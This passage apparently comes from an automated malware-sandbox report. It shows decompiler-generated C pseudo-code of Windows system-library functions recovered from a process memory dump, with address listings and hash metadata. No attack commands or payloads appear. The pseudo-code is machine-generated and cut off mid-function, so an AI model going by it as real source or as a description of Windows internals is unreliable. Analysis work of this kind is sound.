								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E02B3F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E02B313C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L02B177F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E02B39650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                        0x02afc608
                        0x02afc615
                        0x02afc625
                        0x02afc62d
                        0x02afc635
                        0x02afc640
                        0x02afc680
                        0x02afc687
                        0x02afc688
                        0x02afc689
                        0x02afc694
                        0x02afc694
                        0x02afc642
                        0x02afc64a
                        0x02afc697
                        0x02b67a25
                        0x02b67a2b
                        0x02b67a2e
                        0x02b67a30
                        0x02b67bea
                        0x02b67bea
                        0x00000000
                        0x02b67bea
                        0x02b67a36
                        0x02b67a43
                        0x02b67a48
                        0x02b67a4c
                        0x02b67a4e
                        0x00000000
                        0x00000000
                        0x02b67a58
                        0x02b67a5a
                        0x02b67a5b
                        0x02b67a5c
                        0x02b67a5d
                        0x02b67a63
                        0x02b67a64
                        0x02b67a6a
                        0x02b67a6c
                        0x02b67a6e
                        0x02b679cb
                        0x02b679cb
                        0x02b679ce
                        0x02b679d0
                        0x02b67a98
                        0x02b67a9b
                        0x02b67a9b
                        0x02b67a9e
                        0x02b67aa1
                        0x02b67bbe
                        0x02b67bbe
                        0x02b67bc0
                        0x02b67be0
                        0x02b67be0
                        0x02b67a01
                        0x02b67a01
                        0x02b67a05
                        0x02b67a07
                        0x02b67a15
                        0x02b67a15
                        0x02b67a1a
                        0x00000000
                        0x02b67a1a
                        0x02b67bc2
                        0x02b67bc6
                        0x02b67bc9
                        0x02b67bcd
                        0x02b67bcf
                        0x02b679e6
                        0x02b679e6
                        0x02b679eb
                        0x02b679eb
                        0x02b679ef
                        0x02b679f1
                        0x00000000
                        0x00000000
                        0x02b679f3
                        0x02b679f5
                        0x02b679ff
                        0x02b679ff
                        0x00000000
                        0x02b679ff
                        0x02b679f7
                        0x02b679fd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b679fd
                        0x02b67bd5
                        0x02b67bd8
                        0x00000000
                        0x00000000
                        0x02b67ba9
                        0x02b67bac
                        0x02b67bb0
                        0x02b67bb1
                        0x02b67bb1
                        0x02b67bb6
                        0x00000000
                        0x02b67bb6
                        0x02b67aa7
                        0x02b67aaa
                        0x00000000
                        0x00000000
                        0x02b67ab2
                        0x02b67ab3
                        0x02b67ab5
                        0x02b67aec
                        0x02b67aef
                        0x02b67b25
                        0x02b67b28
                        0x02b67b62
                        0x02b67b64
                        0x02b67b8f
                        0x02b67b92
                        0x02b67b96
                        0x02b67b98
                        0x00000000
                        0x00000000
                        0x02b67b9e
                        0x02b67b9f
                        0x02b67ba3
                        0x00000000
                        0x02b67ba3
                        0x02b67b66
                        0x02b67b68
                        0x02b67ae2
                        0x02b67ae2
                        0x00000000
                        0x02b67ae2
                        0x02b67b6e
                        0x02b67b72
                        0x02b67b75
                        0x02b67b81
                        0x02b67b85
                        0x02b67b87
                        0x00000000
                        0x00000000
                        0x02b67b31
                        0x02b67b34
                        0x02b67b3c
                        0x02b67b45
                        0x02b67b46
                        0x02b67b4f
                        0x02b67b51
                        0x02b67b57
                        0x02b67b59
                        0x02b67b59
                        0x00000000
                        0x02b67b59
                        0x02b67b77
                        0x00000000
                        0x02b67b77
                        0x02b67b2a
                        0x00000000
                        0x02b67b2a
                        0x02b67af1
                        0x02b67af3
                        0x00000000
                        0x00000000
                        0x02b67afb
                        0x02b67afc
                        0x02b67afe
                        0x00000000
                        0x00000000
                        0x02b67b00
                        0x02b67b03
                        0x00000000
                        0x00000000
                        0x02b67b05
                        0x02b67b09
                        0x02b67b0d
                        0x02b67b0f
                        0x00000000
                        0x00000000
                        0x02b67b18
                        0x02b67b1d
                        0x00000000
                        0x02b67b1d
                        0x02b67ab7
                        0x02b67ab9
                        0x00000000
                        0x00000000
                        0x02b67abf
                        0x02b67ac1
                        0x00000000
                        0x00000000
                        0x02b67ac3
                        0x02b67ac6
                        0x00000000
                        0x00000000
                        0x02b67ac8
                        0x02b67acc
                        0x02b67ad0
                        0x02b67ad2
                        0x00000000
                        0x00000000
                        0x02b67adb
                        0x00000000
                        0x02b67adb
                        0x02b679d6
                        0x02b679d9
                        0x02b679dc
                        0x02b67a91
                        0x02b67a94
                        0x00000000
                        0x02b67a94
                        0x02b679e2
                        0x00000000
                        0x02b679e2
                        0x02b67a74
                        0x02b67a7a
                        0x00000000
                        0x00000000
                        0x02b67a8a
                        0x02b67a21
                        0x02b67a21
                        0x00000000
                        0x02b67a21
                        0x02afc650
                        0x02afc651
                        0x02afc656
                        0x02afc65c
                        0x02afc65d
                        0x02afc663
                        0x02afc664
                        0x02afc66a
                        0x02afc66e
                        0x02b679c5
                        0x02b679c7
                        0x00000000
                        0x02b679c7
                        0x02afc67a
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 25721b77bd66485f9f5afaaf7108d74aa7a7bbb30e3bb7da35be927a12638528
                        • Instruction ID: be60ecadc3383f1d2227ba15d8c5f65b7a4fb1d0717bce0dd7bcadbbaa4ffd14
                        • Opcode Fuzzy Hash: 25721b77bd66485f9f5afaaf7108d74aa7a7bbb30e3bb7da35be927a12638528
                        • Instruction Fuzzy Hash: 3E81B1756046029BCB21CE14C894B7AF3E5FF8835CF1848AAEE558B240DB39DD40DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B8B8D0, Relevance: .2, Instructions: 199COMMON
                        Download Yara Rule
                        C-Code - Quality: 39%
                        			E02B8B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x2be7b9c; // 0x0
				_t124 = L02B14620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E02B39800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E02B395B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E02B395D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L02B177F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E02B39910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E02B395D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x2be7b9c; // 0x0
									_t92 = L02B14620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E02B39910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E02AFA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E02B8E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E02B8E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E02B395B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                        0x02b8b8d9
                        0x02b8b8e4
                        0x00000000
                        0x02b8b8e6
                        0x02b8b8f3
                        0x02b8b8f5
                        0x02b8b8f5
                        0x02b8b8f8
                        0x02b8b920
                        0x02b8b924
                        0x02b8b936
                        0x02b8b939
                        0x02b8b93d
                        0x02b8b948
                        0x02b8b9a0
                        0x02b8b9a0
                        0x02b8b9a4
                        0x02b8b9bf
                        0x02b8b9c4
                        0x02b8b9c6
                        0x02b8b9cd
                        0x02b8b9d1
                        0x02b8bad4
                        0x02b8bad8
                        0x02b8bada
                        0x02b8badc
                        0x02b8badc
                        0x02b8badf
                        0x02b8bae0
                        0x02b8bae2
                        0x02b8bae4
                        0x02b8baec
                        0x02b8baee
                        0x02b8baf0
                        0x02b8baf0
                        0x02b8baec
                        0x02b8bafb
                        0x02b8bafc
                        0x02b8bafe
                        0x02b8bb01
                        0x02b8bb01
                        0x00000000
                        0x02b8bb06
                        0x02b8b9d7
                        0x02b8b9db
                        0x02b8b9db
                        0x02b8b9de
                        0x02b8b9de
                        0x02b8b9e4
                        0x02b8b9e7
                        0x02b8b9ea
                        0x02b8b9ec
                        0x02b8b9ef
                        0x02b8b9f3
                        0x02b8ba1b
                        0x02b8ba1b
                        0x02b8ba23
                        0x02b8ba24
                        0x02b8ba27
                        0x02b8ba2a
                        0x02b8ba2b
                        0x02b8ba2e
                        0x02b8ba30
                        0x02b8ba37
                        0x02b8ba3f
                        0x02b8ba9c
                        0x02b8baa2
                        0x02b8bb13
                        0x02b8bb15
                        0x02b8baae
                        0x02b8baae
                        0x02b8bab3
                        0x02b8bab5
                        0x02b8baba
                        0x02b8bac8
                        0x02b8bac8
                        0x02b8baba
                        0x02b8bacd
                        0x02b8bacf
                        0x00000000
                        0x02b8bacf
                        0x02b8bb1a
                        0x00000000
                        0x02b8bb1c
                        0x02b8baa7
                        0x02b8bb11
                        0x00000000
                        0x02b8bb11
                        0x02b8baa9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b8ba41
                        0x02b8ba41
                        0x02b8ba41
                        0x02b8ba58
                        0x02b8ba5d
                        0x02b8ba62
                        0x00000000
                        0x00000000
                        0x02b8ba64
                        0x02b8ba67
                        0x02b8ba68
                        0x02b8ba69
                        0x02b8ba6c
                        0x02b8ba6f
                        0x02b8ba71
                        0x02b8ba78
                        0x02b8ba80
                        0x00000000
                        0x00000000
                        0x02b8ba90
                        0x02b8ba90
                        0x02b8ba97
                        0x00000000
                        0x02b8ba97
                        0x02b8b9f5
                        0x02b8b9f7
                        0x02b8b9f7
                        0x02b8b9fa
                        0x02b8ba03
                        0x02b8ba07
                        0x02b8ba0c
                        0x02b8ba10
                        0x02b8ba17
                        0x00000000
                        0x02b8b9f7
                        0x02b8b9a6
                        0x02b8b9a8
                        0x02b8b9af
                        0x02b8b9b3
                        0x00000000
                        0x00000000
                        0x02b8b9b9
                        0x00000000
                        0x02b8b9b9
                        0x02b8b94d
                        0x02b8b98f
                        0x02b8b995
                        0x02b8b999
                        0x02b8b960
                        0x02b8b967
                        0x02b8b968
                        0x02b8b96a
                        0x00000000
                        0x02b8b96a
                        0x02b8b99b
                        0x02b8b99e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b8b99e
                        0x02b8b951
                        0x02b8b954
                        0x02b8b95a
                        0x02b8b95e
                        0x02b8b972
                        0x02b8b979
                        0x02b8b97d
                        0x02b8b97f
                        0x02b8b980
                        0x02b8b982
                        0x02b8b984
                        0x00000000
                        0x02b8b984
                        0x00000000
                        0x02b8b926
                        0x00000000
                        0x02b8b926

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d89ee4c4560e9cf2b302a72f0b793c8dafcf0f0c2725c63ea9a8053ac4b374af
                        • Instruction ID: f82e9fec7bb1769ddb61949bfb1b0d5bf1f05f3541c3cdc87184fe0b0a4fc464
                        • Opcode Fuzzy Hash: d89ee4c4560e9cf2b302a72f0b793c8dafcf0f0c2725c63ea9a8053ac4b374af
                        • Instruction Fuzzy Hash: 55710032240B01EFDB32EF24C844F66B7E6EF44728F1545A8E669CB2A0DB75E945CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B76DC9, Relevance: .2, Instructions: 199COMMON
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E02B76DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E02B76B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E02B17D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E02B39AE0();
					_t87 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E02B7795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E02B7795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E02B7795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E02B7795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L02B14620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E02B76B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E02B76B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E02B76B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E02B76B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E02B17D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E02B39AE0();
								L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L02B12400( &_v36);
							if(_v24 >= 0) {
								_t87 = L02B12400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L02B12400( &_v52);
							}
							if(_v28 >= 0) {
								return L02B12400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                        0x02b76dd4
                        0x02b76dde
                        0x02b76de1
                        0x02b76de3
                        0x02b76de6
                        0x02b76de9
                        0x02b76dec
                        0x02b76def
                        0x02b76df2
                        0x02b76df5
                        0x02b76dfe
                        0x02b76e04
                        0x02b76e09
                        0x02b76e0d
                        0x02b76e18
                        0x02b76e1b
                        0x02b76e22
                        0x02b76e2d
                        0x02b76e30
                        0x02b76e36
                        0x02b76e42
                        0x02b76e4d
                        0x02b76e50
                        0x02b76e55
                        0x02b76e5c
                        0x02b76e6e
                        0x02b76e5e
                        0x02b76e67
                        0x02b76e67
                        0x02b76e73
                        0x02b76e74
                        0x02b76e77
                        0x02b76e7c
                        0x02b76e7d
                        0x02b76e8e
                        0x02b76e93
                        0x02b76e9c
                        0x02b76ea8
                        0x02b76eab
                        0x02b76eac
                        0x02b76eb3
                        0x02b76ecd
                        0x02b76edc
                        0x02b76ee2
                        0x02b76ee5
                        0x02b76ef2
                        0x02b76efb
                        0x02b76f01
                        0x02b76f06
                        0x02b76f0b
                        0x02b76f11
                        0x02b76f1a
                        0x02b76f22
                        0x02b76f26
                        0x02b76f26
                        0x02b76f33
                        0x02b76f41
                        0x02b76f44
                        0x02b76f47
                        0x02b76f54
                        0x02b76f65
                        0x02b76f77
                        0x02b76f7c
                        0x02b76f82
                        0x02b76f91
                        0x02b76f99
                        0x02b76fa3
                        0x02b76fae
                        0x02b76fae
                        0x02b76fba
                        0x02b76fbb
                        0x02b76fbc
                        0x02b76fc1
                        0x02b76fc2
                        0x02b76fd3
                        0x02b76fd8
                        0x02b76fd8
                        0x02b76fdf
                        0x02b76fe8
                        0x02b76fee
                        0x02b76fee
                        0x02b76ff5
                        0x02b76ffb
                        0x02b76ffb
                        0x02b77004
                        0x00000000
                        0x02b7700a
                        0x02b77004
                        0x02b76eb3
                        0x02b76e9c
                        0x02b77015

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction ID: 3e397923cd40823299fc098d615aefea28e9cd9fc86473ea6b7038a8d93463a1
                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction Fuzzy Hash: 1F716D71A00619AFCB11DFA4C984AEEFBBAFF48714F1441A9E515A7290DB30AA41DF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AF52A5, Relevance: .2, Instructions: 161COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E02AF52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E02B0EEF0(0x2be79a0);
					_t104 =  *0x2be8210; // 0x601cb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E02B0EB70(_t93, 0x2be79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E02B39890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E02B0EEF0(0x2be79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E02B0EB70(0, 0x2be79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x601cbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E02B2F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E02B0EEF0(0x2be79a0);
									__eflags =  *0x2be8210 - _t104; // 0x601cb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x2be8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E02B74888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E02B0EB70(_t95, 0x2be79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E02B395D0();
											L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E02B395D0();
											L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E02B0EB70(_t93, 0x2be79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E02B395D0();
										L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E02B395D0();
										L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
